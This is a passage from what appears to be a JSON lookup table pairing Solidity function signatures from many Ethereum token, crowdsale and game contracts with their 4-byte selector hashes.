"optionInitialSupply()": "0xee0d93ce", "totalSupplyPreSale()": "0x9aefff29", "preMcFlyWallet()": "0x7de0cc65", "firstLevelPrice()": "0xe9e32bfb", "requireWhitelistedAddress()": "0x5b4d20d2", "priceLastUpdateRequest()": "0x6fd8282f", "LAUNCH_DATE()": "0xbd93f493", "lastTrade()": "0x9b44cb3c", "PRESALE_MAX_RAISE()": "0xae873fa5", "preSaleHasEnded()": "0x30e45c14", "vinciSold()": "0x1568a1a1", "threshold1()": "0x01253fbf", "corporationContract()": "0x93bebdec", "pusherTracker_()": "0x521ceba7", "coinsaleDeadline()": "0x34cad836", "masterOwner()": "0xe7201d7d", "r15Backers()": "0x0e2a9237", "SALE0_CAP()": "0xa4f89235", "MOMO_FOUNDATION_WALLET()": "0x165b9ad0", "marketing()": "0x2d3e474a", "mayorCutPercentage()": "0xd430381b", "distributor_address()": "0xb2ad35c0", "totalHouseWinnings()": "0xb5a02db1", "tokensToSold()": "0x80b30c13", "ICORaised()": "0x3c8394ac", "btcTokenBoughtAddress()": "0x58932f50", "mainWallet()": "0x23b62b75", "debtPaid()": "0xcbb04cbd", "startTimeOne()": "0xa2c4a06f", "dailyDistribution()": "0xde8f55af", "withdrawalOpen()": "0x7757fc5d", "coinsToSell()": "0xf40e0b6e", "FWDaddrETH()": "0xcaefdbe9", "exchangeIsRunning()": "0x32c6f315", "adPriceMultiple()": "0x26bd4d96", "ethUsdRateInCent()": "0x106b291f", "MainSalePrice()": "0x005b42cb", "MIN_FUNDING()": "0x483c8400", "sendGameGift(address)": "0xa30fb52d", "withhold(address,uint256)": "0xd68e462c", "setBanker(address,uint256,uint256)": "0xb57adee3", "canSetBanker()": "0x6616c886", "withdrawAllToken()": "0x14870d2c", "depositToken(uint256)": "0x6215be77", "USTToken(address,string,string,uint8)": "0x22cf1745", "Remain_burn(uint256)": "0x13d9028b", "Dasabi_ioToken()": "0x1bc44200", "_resultToRoll(string)": "0x482fbae2", "_getAvailableBalance()": "0x4a6de5c3", "_calculatePayout(bytes32,uint256)": "0x72ff285e", "_getQueryStr(uint256,uint256)": "0x1903bbe0", "_computeRollFee(uint256)": "0x6ae0646a", "rollDice(uint256)": "0xacfff377", "getMaxProfit()": "0xec062ac0", "shl8(uint8,uint8)": "0xcf0f0593", "BZToken(uint256,string,string)": "0xb637b7c4", "miningResolve(uint256,uint256)": "0x216ea239", "_miningOneSelf(address)": "0x1aed001e", "_transferHelper(address,uint256)": "0xdd7aabc8", "_addOrder(address,uint64)": "0x755b9d63", "_getFashionParam(uint256)": "0x6497b400", "changePlatPrice(uint32,uint256)": "0xebd03c55", "setFashionSuitCount(uint16,uint256)": "0x97ce8c43", "setRecommendStatus(bool)": "0xd80162fc", "setMaxProtoId(uint16)": "0x45e3553e", "setDataMining(address)": "0xdbb62f24", "getOrderCount()": "0x8d0a5fbb", "withdrawPlat()": "0x51784a75", "getPlatBalance()": "0x1a3ae67a", "ActionMiningPlat(address,uint16,address)": "0x2053480e", "_randBySeed(uint256)": "0xb9da4033", "_rand()": "0x8592b778", "setTokenSymbol(string)": "0xba51b1b4", "setTokenName(string)": "0xa4f29aad", "CarbonExchangeCoinToken()": "0xa2f5ee48", "GEEKSID()": "0xe9e04195", "AprilAirdrop(address,address)": "0x0eebdb04", "AidCoin()": "0xec0317ff", "TokenTimelock(address,address,uint64)": "0xe894f117", "CryptFillToken()": "0x9a9c437d", "Coin786token18()": "0x916dbc9e", "Educoin(uint256,string,uint8,string)": "0x426bc60c", "Epilepsy()": "0x1016eadb", "setEndTime(uint32)": "0x72298b82", "setRateProvider(address)": "0xb0c20e4a", "MyWillCrowdsale(uint32,uint32,uint256,uint256)": "0x5af0e1ae", "removeExclusiveRate(address)": "0x823213ef", "setExclusiveRate(address,uint256,uint16,uint32)": "0x8b9724d1", "getRate(address,uint256,uint256)": "0x33281815", "closeVault()": "0x18976fa2", "RefundableCrowdsale(uint32,uint32,uint256,address,uint256)": "0x35f8a2c6", "FinalizableCrowdsale(uint32,uint32,uint256,address)": "0xc281a013", "hasEnded(uint256)": "0xc36572d6", "validPurchase(uint256,uint256,uint256)": "0x89a81e83", "getRateScale()": "0xe8adf589", "getBaseRate()": "0xb655d0c4", "Crowdsale(uint32,uint32,uint256,address)": "0x9214e527", "addExcluded(address)": "0xa9321573", "crowdsaleFinished()": "0xece84fd5", "buytoken(uint256)": "0x19bece1b", "updatetoken(uint256,string,string,uint256)": "0xe397dfd1", "createtoken(string,string,uint256)": "0xabad3466", "TestERC721()": "0x4e1fa837", "BBPToken(address,uint256)": "0xa3b4ab48", "BYN()": "0xa55ee823", "STEP()": "0x53d0f255", "TeamCoin()": "0x1b748399", "MauiWowieToken()": "0x8f2be8e0", "MineablePOWCoin()": "0x1f47b50d", "Seedex420(uint256,string,uint8,string)": "0x7719f57e", "closeCrowdsale(bool)": "0xecba18c0", "getUnsoldTokensWithDecimals(uint256,uint256)": "0x9f1eaa4c", "getUnsoldTokens(uint256)": "0x947f97cc", "changeStage(uint256)": "0x7ae4bff8", "checkAdmin()": "0xab150226", "BDC()": "0x8379d75b", "KorkToken()": "0xce3e82a4", "eosDASH(uint256,uint256)": "0xcf81377d", "createTokensForCrypton()": "0x45ff59b2", "CryptonCoin()": "0x0b43c6e6", "migrateUserData()": "0xd6555687", "enableATMExchange()": "0x8aee3a54", "disableATMExchange()": "0x9f684a0d", "claimToken(address,uint256)": "0x1698755f", "claimUserToken(address)": "0x537dbb80", "claimFoundationToken()": "0xc36ff164", "setLockStartTime(uint256)": "0xc54704e6", "lockToken(address,uint256)": "0x17be3fa5", "collect(address)": "0x06ec16f8", "buy(uint256,address,uint256)": "0x2afaca20", "importExchangeSale(uint256,address,uint256)": "0xd9c57bcc", "Contribution(address,address,uint256,uint256)": "0x11baae84", "setDisabled(bool)": "0x6c5a7d1e", "getATMHoldersNumber()": "0x47a6e601", "getATMTotalSupply()": "0x681d8345", "ATMToken(uint256)": "0x064aa0e3", "BKB()": "0xa54efb1e", "isRoundThreeSalePeriod(uint256)": "0x79a18b3a", "logs(bytes)": "0xe7950ede", "updateClientVersion(bytes32)": "0x03e9598c", "updatePoolContract(address)": "0xff1d9dd4", "SmartpoolVersion(address[3])": "0xe8e5882e", "floorLog2Test(uint256)": "0xce782e08", "fixedExpTest(uint256,uint8)": "0xb3ed2081", "findPositionInMaxExpArrayTest(uint256)": "0xa25a34b1", "lnTest(uint256,uint256)": "0xdc06d8f8", "powerTest(uint256,uint256,uint32,uint32)": "0x8c5ce82a", "TestBancorFormula()": "0x96c85b59", "setQuestionFee(uint256)": "0x4df6ca2a", "setAnswerFee(uint256)": "0xf41c1c93", "newAnswer(uint256,uint256)": "0x476c494c", "newQuestion(string)": "0xa3f66b46", "closeQuestion(uint256)": "0xc09f32e8", "hasSenderVoted(uint256)": "0x31d31647", "Voting()": "0xb96f8a39", "ANPlaceholder(address,address)": "0x379abed8", "swapWinner(uint256,bool,uint256)": "0xbb6996a5", "ROSCAv1(uint16,uint128,uint256,address[],uint16)": "0x8033c643", "getNizkStruct()": "0x96284fb6", "pageBuyRecordByAccount(address,uint256,uint256)": "0xc1ccaed3", "pageByAccount(address,uint256,uint256,uint256)": "0xdfbd9973", "listAllBuyBalance(address,uint256,uint256)": "0x2b214618", "allowancePaillier(address,address)": "0x081e21b4", "approvePaillier(address,string)": "0xc2ae7e14", "totalSupplyPaillier()": "0x1dd14a96", "balanceOfPaillier(address)": "0xb41fc258", "transferPaillier(string,address)": "0xe5612d0e", "buyFrom(string,address)": "0x488fdb81", "setCirculationShares(string)": "0xdbbe2ff9", "setPubkey(string)": "0xd0e3f734", "getPubkey(address,address)": "0x50058508", "JuzixTokenManager()": "0x8d3c7415", "getCensored(address,uint256)": "0x09a02562", "censorAndCover(address,uint256,string)": "0x73032446", "removeAdv(address)": "0xc83507a8", "verifyOwnership(address)": "0x2cc9c151", "getAdv(address)": "0x60a64947", "addAdv(address,string)": "0x5c44c3e5", "ADV()": "0x8ea56e57", "acceptVestingTrusteeOwnership()": "0xcfabe67b", "requestVestingTrusteeOwnershipTransfer(address)": "0xc28f9df1", "acceptKinTokenOwnership()": "0x333abd90", "requestKinTokenOwnershipTransfer(address)": "0xe5e53493", "saleEnded()": "0x9b8906ae", "grantTokens()": "0x34fa37da", "setHardParticipationCap(uint256)": "0x64329400", "setTier2Participants(address[])": "0x35400daf", "setTier1Participants(address[])": "0xa3ea478f", "deleteTokenGrant(address)": "0x3b825302", "addTokenGrant(address,uint256)": "0xb8ad2abe", "initTokenGrants()": "0xd6eac4cd", "KinTokenSale(address,uint256)": "0x0cde6009", "emitUserCreated(address,address,address,address,uint8[],uint256,uint256[],uint256[])": "0x5c0796fd", "_emitUserCreated(address,address,address,address,uint8[],uint256,uint256[],uint256[])": "0x13175b40", "_setSkills(address,uint256,uint256[],uint256[])": "0x0c65829b", "_setRoles(address,uint8[])": "0x983a8c8a", "createUserWithProxyAndRecovery(address,address,uint8[],uint256,uint256[],uint256[])": "0x5be62401", "getUserLibrary()": "0x127c3d45", "UserFactory(address)": "0x48a1befb", "setMany(address,uint256,uint256[],uint256[])": "0xd5a18e4c", "FixedGameToken(bytes32,uint256,address)": "0x7a4bfebb", "getDynamicArrayElement(uint256)": "0xded24016", "setDynamicArrayElement(int8,uint256)": "0xee66a18d", "getDynamicArraySize()": "0x4fcc9e07", "setDynamicArraySize(uint256)": "0x1c607f14", "getStaticArray()": "0x4b0daadb", "getStaticArraySum()": "0xc186dcbf", "staticArrayChangeValue(int8,uint256)": "0x47913dfe", "staticArrayTests()": "0x799dcf7e", "ArrayPractice()": "0x812cf740", "getProposalName(uint256)": "0x429b92bf", "getLastEmissionNum()": "0x101817ba", "calculateDividendsFor(address)": "0xd8cbce53", "payDividendsTo(address)": "0x26208591", "mintInternal(int256,address,uint256)": "0xcc50fc28", "emissionInternal(uint256)": "0x53e68147", "disableMinting()": "0x7e5cd5c1", "MintableMultiownedToken(address[],uint256,address)": "0xcb586251", "buyPlace(uint256,string)": "0x8dffe5c0", "hosting(uint256)": "0x59eee5c7", "restartAssign()": "0x85587375", "stopAssign()": "0x54604eec", "teamPayment(address)": "0xa3f31b80", "sendTokenUpdate(address,uint256)": "0x688b410f", "receiveEtherFormOwner()": "0x91a3cec0", "create(address,uint256,uint256,address,address)": "0x24ce2917", "create(address,uint256,uint256,address,address,address)": "0x31a2aba8", "TokenEscrow()": "0x77a6cb64", "setFoo(uint256)": "0xdc80035d", "VariableConstructor(string)": "0x73cd148e", "get_foo()": "0x62e2d0de", "set_foo(string)": "0xe6441201", "Mortal_HelloWorld()": "0xa56a1de0", "f_internal()": "0x85ef4ae7", "f_public()": "0xc9801b50", "f_priv()": "0x9f90279e", "fun(uint256,uint256)": "0xe9a58c40", "fun(int256)": "0xfecc36c0", "CCIToken()": "0x18d76b78", "addPixelPayable(uint256,uint256,uint256,uint256,uint256)": "0x3101170b", "getColor(uint256,uint256)": "0xeded5d9e", "getAddress(uint256,uint256)": "0x9262d759", "setOracleQueryType(string)": "0x5525d87f", "ATM(uint256,string,uint8,string)": "0xb48585e5", "_withdrawProfit()": "0x51b98927", "transferTokensFromBountyAddress(address,uint256)": "0xb78e5e26", "transferTokensFromAdvisorsAddress(address,uint256)": "0xcd180fdc", "transferTokensFromPartnersAddress(address,uint256)": "0x1b360912", "transferTokensFromTeamAddress(address,uint256)": "0x3db36b5f", "transferTokensFromProjectFundAddress(address,uint256)": "0xcb7aac1e", "acceptTokensFromUsers(address,uint256)": "0x214af6b9", "setSaasApiProfitAddress(address)": "0xf3e664c9", "setContractorsProfitAddress(address)": "0xb1829738", "setTeamProfitAddress(address)": "0xfe647394", "setHostingProfitAddress(address)": "0x591451fe", "setLawSupportProfitAddress(address)": "0x779d2e20", "setNeironixProfitAddress(address)": "0x6cd40993", "setMarketingProfitAddress(address)": "0xf65d1488", "bitskiToken()": "0xdb4bb866", "registerNameCore(uint256,address,bytes32,bool,bool)": "0x5dc6f3df", "ICC()": "0x372f88b6", "StealthGridToken(uint256,string,string)": "0x2acf3908", "BOSX()": "0xb11873d1", "DXBToken()": "0x51f80746", "HiBTCToken()": "0x2ac1a995", "setAutoSell(uint256)": "0xc4e9e80b", "setAuthor(string)": "0x3fe14e03", "setAutoBuy(uint256)": "0x3587b26c", "BBTToken(address)": "0x2ead28fa", "releaseTimeLock(address,uint256)": "0xe4547443", "distributeWithLockup(address,uint256,uint256,uint256,uint256)": "0xc572652b", "showLockState(address,uint256)": "0xc9e075c6", "lock(address,uint256,uint256,uint256,uint256)": "0x7c759d0d", "investFor24Months(address,uint256,uint256)": "0xe7fa6883", "investFor12Months(address,uint256,uint256)": "0xc32cc6d5", "getCompoundPlan(uint256)": "0x1ef75084", "getCompoundContract(uint256)": "0xeea147c7", "geCompoundTimestampsFor24Months(uint256)": "0x3eeb3235", "geCompoundTimestampsFor12Months(uint256)": "0x928f16e3", "lockedEarningsOf(address)": "0xca2571af", "lockedCapitalOf(address)": "0xce5478a4", "unlockEarnings(address,uint256)": "0x1f59d30e", "unlockCapital(address,uint256)": "0xb5d34966", "lockMoney(address,uint256,uint256)": "0xeab88624", "validateCompoundContract(uint256)": "0xc005c686", "payCompoundTerm(uint256,uint8,uint8)": "0xdefefe96", "lockMoneyOnCompoundCreation(address,uint256)": "0x72422024", "calculateCompoundContract(uint256,uint256)": "0xca0370f7", "generateCompoundTerms(uint256)": "0xe3f563f6", "initCompoundContract(address,uint256,uint256,uint256)": "0xea6f0725", "dateToTimestamp(uint16,uint8,uint8)": "0x1ebfa358", "getDaysInYear(uint16)": "0xa90a8eea", "getYearDay(uint256)": "0x62c19061", "USDCToken()": "0x4c34c8de", "setAllocation(address,address,uint256,uint256,uint256)": "0xd0ef368d", "getRank(address)": "0x548c0ef4", "checkAddressMisused(address)": "0xcce2f8e3", "_stake(bytes32,uint256,uint256,address)": "0xb333b0ee", "_execute(bytes32)": "0xa05b8ed8", "getParametersHash(uint256[14])": "0x536db4a8", "getBoostedProposalsCount(address)": "0xf3d305b4", "redeemDaoBounty(bytes32,address)": "0x6359036b", "getStaker(bytes32,address)": "0x16db5172", "stakeWithSignature(bytes32,uint256,uint256,uint256,uint256,bytes)": "0x488c65fc", "tan(int256)": "0x1c9cafd7", "cos(int256)": "0x9b666d7a", "sin(int256)": "0x16173f39", "sinLimited(int256,int216)": "0x684fbfdb", "pow(int256,int256)": "0x92b0c5b2", "expLimited(int256,int256)": "0x828c06cd", "ln(int256)": "0x8e6f2353", "lnLimited(int256,int256)": "0x90c459a3", "rescale(int256)": "0x8371e1e9", "findbit(uint256)": "0xdaa5f48b", "hibit(uint256)": "0xc3a4f8b5", "ipow(int256,int216)": "0x7a5dbc21", "fraction(int216,int216)": "0x3bf329bf", "ipart(int256)": "0x5447b86f", "fpartSigned(int256)": "0x22ebc4a0", "fpart(int256)": "0xef36fa39", "fractionalBits(int256)": "0xf597f97d", "round(int256)": "0x58b4370b", "fromReal(int256)": "0x6a4aef9d", "toReal(int216)": "0x26798680", "multisend3(address[],uint256[],uint256[],address[],uint256[])": "0x8071aa05", "info(address)": "0x0aae7a6b", "timeLeft(address)": "0x405c649c", "calculate(address)": "0x50003ca6", "LifeSet_006()": "0x180a42a3", "Bytelending(uint256,string,string)": "0xc144a5db", "DMDPangea()": "0x47cfbaf4", "COPIthereum(uint256,string,string)": "0x47d0dd3c", "SECToken()": "0xafbea641", "feeToSeconds(uint256)": "0xe8b6bbe4", "setPaymentAddress(address)": "0x5e1e1004", "rivetzRelease(uint256)": "0x30b751d9", "setExpiration(uint256,uint256)": "0x07031305", "setValid(uint256,bool)": "0x260c2214", "jackpotSmall()": "0x1ae7b7fb", "ethVerify()": "0x08722e78", "maxMintingDays()": "0xa41ff1e5", "ICOWeiRaised()": "0xa98a6d19", "isSuccessfulIco()": "0xb21a8be0", "ICO_TOKENS()": "0xb6062b5b", "totalSupplyCeiling()": "0x95a51233", "MaxOffer()": "0x54ffb323", "authorizeMintToken()": "0xb7efc1cd", "exchangeFlag()": "0x9a70855e", "ROLE_SUPER()": "0x1e52ca35", "isVoting()": "0x1bbef399", "calcMode()": "0xd402be57", "date_start()": "0xdd7f88ee", "TOTAL_TEAM_TOKENS()": "0x3f4d97f0", "tokenInitialised()": "0x9d9c9439", "commission_ratio()": "0x877ddd77", "DEFROST_AFTER_MONTHS()": "0xa07f0a98", "CharterCapital()": "0xae1345c4", "getTotalRankTokens()": "0x8b6715cd", "orderEnd()": "0xd618996b", "consul()": "0xad7df080", "snailPot()": "0x6c3aaab7", "gameOpponent()": "0xfef8383e", "currentIcoTokenPrice()": "0x2b9ce01e", "purchaseSilver()": "0xc17ed7bd", "paoContactAddress()": "0x108c3708", "allowedAirDropTokens()": "0x6ff8e332", "soldedSupply()": "0x0d679531", "addr_teamPartToken()": "0xd7575592", "flushDividends()": "0x151d7d32", "lockQtyToAllowTrading()": "0x7e3475a8", "logoURL()": "0xd2ce89e5", "startTimeRound1()": "0x40bc9308", "advisorsPeriodAmount()": "0xd02041f3", "coeff()": "0x87b261ad", "extraTokensPerUnit()": "0xeced6c57", "tttTokenAddress()": "0xa64ded31", "lockDownPeriod()": "0x4f3bb920", "betBLenght()": "0x6422816b", "ADVISOR_ONE()": "0x9fa9b04c", "DEVELOPERS_BONUS()": "0x737732b2", "total_token_sold()": "0xb000dec2", "preSaleAllotment()": "0x485f7a7e", "tierNo()": "0x781c4dad", "weiMaximumAmount()": "0xb032fff4", "minPresaleContributionEther()": "0xc1e74d71", "TOKEN_DECIMAL_MULTIPLIER()": "0x56780085", "c_dateTo()": "0xf5195b62", "_THOUSAND()": "0x4f013ea6", "TIER_2_BUYIN()": "0x4177afa6", "creatorWithdraw()": "0x64ec8bdb", "crowdsaleTotal()": "0xaff1e0de", "isUnrestricted()": "0x8911e26b", "lendingDays()": "0x97299d8a", "trioContract()": "0xd23e09f5", "crowdsaleAllocation()": "0x39918c4f", "genesMarket()": "0x4ddad616", "thirdBonusEnds()": "0xe035e1ac", "date_end()": "0x01c28786", "coinPerEth()": "0xd4c50f00", "PRE_SALE_START_2()": "0xfbfd45f5", "maxFundedValue()": "0xe9d16224", "wildcardTokenId()": "0x4637c85d", "clientSeed()": "0xa457c2ae", "pregnantLinglongCats()": "0x3c0471a2", "lottoIndex()": "0x7a15eb8d", "passoverEndTime()": "0xf577990d", "rvDepositAddress()": "0x2cae249a", "staff_1()": "0xdf181831", "START_WEEK_2()": "0x54e707a0", "totalFundRaised()": "0x9030e40f", "TokenEntity()": "0x314475b2", "edoPerWeiDecimals_()": "0x32b28b95", "TotalRequestsAmount()": "0x9eea480f", "privateIcoTokensForEther()": "0x5c49660a", "tokensBlocked()": "0x542d397c", "presalePiTokensLimit()": "0x89637214", "logoFee()": "0x90bf693b", "teamTokens()": "0xc3e3c7bc", "mainPoolCutPercentage()": "0x19fb52db", "PRESS_MARKETING()": "0x54ca435f", "advertising()": "0x573328ef", "arpDeposited()": "0x15acce5e", "airdropValue()": "0xa7c7d2a0", "buyComissionUnits()": "0xc0981285", "dataController()": "0xbc9968a2", "totalRewarded()": "0xaed29d07", "dateProductCompleted()": "0x531a7f29", "ICOReserveSupply()": "0xc6b6b1e8", "bonusInPhase2()": "0x3c10d7cd", "Token_Saled()": "0xc6317f37", "withdrawControl()": "0x6aa9c82b", "lockedTransfers()": "0xb7a2cbcc", "maintain()": "0x6469c348", "pvpOwnerCut()": "0x4619aa19", "collected_eth()": "0xfa509ff7", "developmentAddress()": "0x638b1b14", "sellCut()": "0x68f169e1", "OwnerDefined()": "0xb3bb8d44", "getSiteTokenId(uint256,uint256)": "0x85529636", "getItemInfo(uint256)": "0xde7fe3e7", "useMultipleItem(uint256,uint256,uint256,uint256,uint256)": "0xb919be66", "useSingleItem(uint256,uint256,uint256)": "0x3f1a1cac", "spawnItem(uint256,uint256,address)": "0xd3392545", "spawnSite(uint256,uint256,address)": "0xebf06bcb", "setAdventureHandler(address)": "0x0b2c588c", "handleMultipleItems(address,uint256,uint256,uint256,uint256,uint256)": "0x5477e571", "handleSingleItem(address,uint256,uint256,uint256,uint256)": "0x1b44a5ef", "Diamond()": "0x6b7d5205", "getWithdraw(address)": "0x3eca264e", "getFoundersGames(address)": "0x659d20eb", "setCostToCreateGame(uint256)": "0xdcafaec2", "KickTheCoinFactory()": "0x5b46016e", "setKtcAddress(address,bool)": "0x21de6b01", "setPool(address)": "0x4437152a", "poolIssue()": "0x6b178f47", "setTotalStakingHistory()": "0x500844dd", "unstake()": "0x2def6620", "getStakingGains(uint256)": "0x66e1cebd", "stake(address,uint256)": "0xadc9772e", "stakeFor(address,uint256)": "0x2ee40908", "stakeScale(uint256)": "0x1d60993b", "updateInflationRate()": "0x61c083b9", "adjustInflationRate()": "0xe4bb7160", "Besiktas()": "0x314ef8cb", "getCRYPTON_CUT()": "0x0544587f", "setCRYPTON_CUT(uint16)": "0x8878db7f", "getXPROMO_MULTIPLIER()": "0xc391d581", "setXPROMO_MULTIPLIER(uint16)": "0xb1ef2e97", "getSECOND_STEP_MULTIPLIER()": "0xa39e1149", "setSECOND_STEP_MULTIPLIER(uint16)": "0x4bafa437", "getFIRST_STEP_MULTIPLIER()": "0x8238cc8f", "setFIRST_STEP_MULTIPLIER(uint16)": "0x32ce92cb", "getFIRST_STEP_LIMIT()": "0x91e6d028", "setFIRST_STEP_LIMIT(uint256)": "0x6c34c97a", "_createCrypton(string,address,uint256,uint256,bool,uint8)": "0x3c8515b1", "setMarkup(uint256,uint256)": "0xa75274e9", "getMarkup(uint256)": "0xdce2b4c1", "setProtectionForMyUnprotectedCrypton(uint256,uint256)": "0x939c23b6", "setPriceForProtectedCrypton(uint256,uint256)": "0x10c067d2", "getCrypton(uint256)": "0x86d35ed9", "Galatasaray()": "0xbf49649b", "registerAuthContract(address)": "0x4e9de828", "donateDivs()": "0xca970bac", "GIDIDAX()": "0xb9e328de", "getRareAddress()": "0x2210d525", "CardsRaffle()": "0x0920d32c", "ICG()": "0x3d65a59d", "OtcgateToken(uint256,uint8,string,string,address)": "0x53295e44", "setICODates(uint256,uint256,uint256,uint256,uint256,uint256)": "0x9c34ae54", "getTimes()": "0xe9ab77e5", "unfreeze(address[])": "0xb0a6d947", "freeze(address[])": "0x1d38fcda", "calcTokensFromEth(uint256)": "0xd3dcd55a", "_updatePhaseTimes()": "0xf4bd65a7", "_updatePhase(bool)": "0xcab39db9", "_calcPhase()": "0xf13ba6a9", "_finalize()": "0xed67bca3", "_finalizeICO()": "0x0cb08e3b", "start(address,uint256)": "0x3c2d70e9", "_addPayment(address,uint256,uint256,uint8)": "0x802f2ffa", "transferICO(address,uint256)": "0x144b2a82", "EyeToken()": "0x2ba0ab78", "EdisonCoin()": "0xd155feec", "payJosh()": "0xa484f413", "tokenSaleCompleted()": "0xc3c357f9", "sendToEthertoteDevelopmentWallet()": "0x31ad6b62", "sendToToteLiquidatorWallet()": "0x0cbc9ce7", "sendToTeamEthContract()": "0x1fe1516d", "Nerotoken()": "0x2c3a1d5d", "KIUSToken()": "0x93051424", "Mojito()": "0xecfef21a", "IMDEXtrade(uint256[8],address[4])": "0xef2e7c48", "IMDEXadminWithdraw(address,uint256,address,uint256)": "0x3c72e9bf", "IMDEXwithdrawToken(address,uint256)": "0x0a4bfa6d", "IMDEXdeposit()": "0x2b03b8d4", "IMDEXdepositToken(address,uint256)": "0x91988783", "IMDEXsetAdmin(address,bool)": "0x9f022f05", "IMDEXsetInactivityReleasePeriod(uint256)": "0xc5bb8af4", "IMDEXinvalidateOrdersBefore(address,uint256)": "0xb92f1986", "IMDEXsetOwner(address)": "0xba87ebfa", "KNTTToken()": "0xd7186f2b", "strConcat(string,string,string,string,string,string)": "0x43700afe", "strConcat(string,string,string,string,string,string,string)": "0x670eedba", "private_setOracleFee(uint256)": "0xb4961379", "private_setMaxMultiRolls(uint256)": "0x094db54b", "private_setMinRollUnder(uint256)": "0xaacd572f", "private_profits()": "0x3763965f", "private_withdraw(uint256,address)": "0x02264b63", "private_withdrawAll(address)": "0xe769f61f", "private_kill()": "0xb1cb9425", "private_setHouseEdge(uint256)": "0xf046cdec", "private_setPauseState(bool)": "0xb6dc1124", "private_setmaxBet(uint256)": "0xfbb78719", "private_setminBet(uint256)": "0xe00ab6dd", "private_setmaxRoll(uint256)": "0xaab633dc", "private_setminRoll(uint256)": "0x297b5dce", "private_setRandomAPI_extract(string)": "0x51777183", "private_setRandomAPIKey(string)": "0x72e861ee", "setReserveWeight(uint32)": "0xd68314ea", "SeaCoin()": "0xbeeb0a82", "SUB(uint256,uint256)": "0xc5639ed2", "ADD(uint256,uint256)": "0xa87de9cc", "switchReserve(address)": "0x3287d0f6", "checkSale()": "0x939de809", "KakushinToken()": "0x012fec73", "safeExp(uint256,uint256)": "0x48eaa435", "setRemainingSupply(uint256)": "0x0c1b33d2", "voltTransfer(address,address,uint256)": "0xb12e3e60", "superTransferFrom(address,address,uint256)": "0xa0385e1c", "mintClose()": "0xa0214c1c", "mintOpen()": "0x24bbd049", "superMint(address,uint256)": "0xfa6171e4", "VoltToken()": "0x6bc99824", "changeTokenExchangeRate(uint256)": "0x3712880c", "changeRemainingSupply(uint256)": "0x6d171f0e", "changeTokenDecimals(uint256)": "0x7e13b0be", "changeTokenSymbol(string)": "0xc6d3ab9d", "changeTokenName(string)": "0xb0018bfc", "setApprove(address,address,address,address,uint256)": "0xead2fba4", "allowance(address,address,address,address)": "0xcd6a7ca7", "BasicToken(string,string,uint256,uint256)": "0x76a64cbf", "getBlockList()": "0xc2ee0a57", "removeBlock(address)": "0xd4ee4041", "addBlock(address)": "0x8c19773f", "VoltOwned(address)": "0x92a39634", "withdrawBidForPunk(uint256)": "0x979bc638", "acceptBidForPunk(uint256,uint256)": "0x23165b75", "enterBidForPunk(uint256)": "0x091dbfd2", "buyPunk(uint256)": "0x8264fe98", "offerPunkForSaleToAddress(uint256,uint256,address)": "0xbf31196f", "offerPunkForSale(uint256,uint256)": "0xc44193c3", "punkNoLongerForSale(uint256)": "0xf6eeff1e", "transferPunk(address,uint256)": "0x8b72a2ec", "getPunk(uint256)": "0xc81d1d5b", "setInitialOwners(address[],uint256[])": "0x39c5dde6", "setInitialOwner(address,uint256)": "0xa75a9049", "CryptoPunksMarket()": "0x0eca4c92", "LadaToken(uint256,string,string,uint8,address)": "0x0a402a32", "GOXX(uint256,string,string)": "0x466bc3bd", "testRevertTx()": "0xf62a92fa", "testRevert()": "0xa26388bb", "balanceOfStocksAt()": "0xbdb4f321", "CUBES()": "0x24600157", "Arbitragebit()": "0x6e8ab641", "KNOW()": "0xa0ad51a6", "buyKNOW()": "0x407cba67", "BasicKNOW()": "0x9eefde81", "burnTotalSupply(uint256)": "0x16e242ca", "burnSupply(uint256)": "0xd595c331", "MMOcoin()": "0xcc105441", "EAsset()": "0x928b06b5", "ZillaGDToken()": "0x060f99c4", "approval(address,address)": "0xe1270b6e", "withDrawFunds()": "0xb78da386", "applyBonus(uint256,uint8)": "0x497484f6", "startNextPhase()": "0xba61810c", "CLXTokenSale(address,address)": "0x289912cc", "setTiersInfo(uint8,uint256[],uint256[],uint256[],uint256[],uint8[2])": "0xc8833f56", "emergencyRestart()": "0xa612c638", "getTokeRate()": "0xd10032dc", "setPhase(uint256)": "0x2cc82655", "sellingAccept(bool)": "0x392114b7", "setAllowClaimUser(address,address)": "0x9df5a643", "IonicCoin()": "0x1d0ced55", "TBXToken()": "0xb88ab668", "calculateWinnerGameType2(uint256,uint256)": "0xaa58d4df", "calculateWinnerGameType1(uint256,uint256)": "0x686b88cd", "hasPlayerWon(uint8,uint256,bytes32,bytes32)": "0xb6d67a0b", "calculateProfitGameType2(uint256,uint256)": "0x99556615", "calculateProfitGameType1(uint256,uint256)": "0xcfec6ca3", "calcProfitFromTotalWon(uint256,uint256)": "0x2b790ee4", "calculateProfit(uint8,uint256,uint256)": "0x643e77d8", "processBet(uint8,uint256,uint256,int256,bytes32,bytes32)": "0x93c6475c", "playerForceGameEnd(uint8,uint256,uint256,int256,uint256,uint256)": "0xca7140ad", "serverForceGameEnd(uint8,uint256,uint256,int256,uint256,uint256)": "0x834d42c6", "endGameConflict(uint8,uint256,uint256,int256,uint256,bytes32,bytes32)": "0x2a0763ce", "isValidBet(uint8,uint256,uint256)": "0x09eecdd7", "maxBalance()": "0x73ad468a", "minHouseStake(uint256)": "0x73c4726b", "GoldeaToken(uint256)": "0x0bb15acc", "IssuedToken(string,string,uint256,uint256)": "0x4ed577bb", "CoinVilaStart()": "0x382fc09f", "CoinVila(address)": "0x3dfcdf2b", "coinAge(address)": "0xaa9cdaf4", "ELIXAddressSetter()": "0xa1ca00c0", "shrimpyramid()": "0xc77dff62", "getTicketTime(bytes32)": "0x7927448a", "getisPlay(bytes32)": "0xef0aea3c", "changeDrawer(address)": "0xe918268b", "changeLimit(uint256,uint256)": "0xd48684d8", "award(bytes32)": "0x4c76318e", "submit(bytes32,bytes32)": "0xd26ff86e", "JungleScratch(address)": "0xfab9caaf", "BdpEntryPoint(address[16],bytes8)": "0xf8b746dd", "setCommission(uint32)": "0x092501a0", "WINR()": "0xeb36d549", "COOLCOIN()": "0xc2535bf0", "LuckyEthereumLotteryToken()": "0x6c04c1c9", "extendEndTime(uint256)": "0x88770cb0", "offeringEnded()": "0x4f4d4728", "setTierEndTime()": "0x586cf845", "getTierTokens(uint8)": "0x7b25ec58", "checkAllowedContribution(address,address,uint256,uint8)": "0xc0f16fab", "checkPoolAddressTierCap(uint8,uint256)": "0xe20b7d3c", "checkTierCap(uint8,uint256)": "0x2b6133f5", "checkAllowedTier(address,address,uint8)": "0x45411c8d", "withdrawCrowdsaleTokens(address,uint256)": "0xe5c6258d", "buyTokens(uint8)": 